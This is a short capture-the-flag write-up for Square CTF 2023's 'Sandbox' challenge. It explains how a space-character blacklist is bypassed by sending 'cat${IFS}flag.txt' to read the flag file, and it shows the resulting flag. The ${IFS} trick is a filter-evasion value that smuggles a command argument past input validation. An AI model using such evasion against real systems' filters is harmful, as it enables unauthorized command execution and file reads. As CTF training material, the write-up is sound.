Sandbox [Square CTF 2023]

pwn
writeup by: H0N3YP0T

Challenge Description

I “made” “a” “python” “sandbox” """" nc 184.72.87.9 8008

Intuition

It seems the server blacklist the space character so I am not able to cat flag.txt.

Solution

Escape the space character by using the following command:

ā”Œā”€ā”€šŸ®¤ļšŒ HON3YP0TšŸ®„ā”€šŸ®¤ļ — 192.168.0.234šŸ®„ā”€šŸ®¤ļŖØ 192.168.0.17šŸ®„
ā”œā”€ā”€šŸ®¤ļ„•  ~šŸ®„
ā””ā”€ļŒ§   nc 184.72.87.9 8008                                            [11:51PM ]
Hi! Welcome to the kidz corner sandbox! we made it super safe in here - you can execute whatever command you want, but only one word at a time so you can't do anything too dangerous, like steal our flags!
cat${IFS}flag.txt
flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}

Flag

flag{did_you_use_ifs_or_python_let_me_know_down_in_the_comments}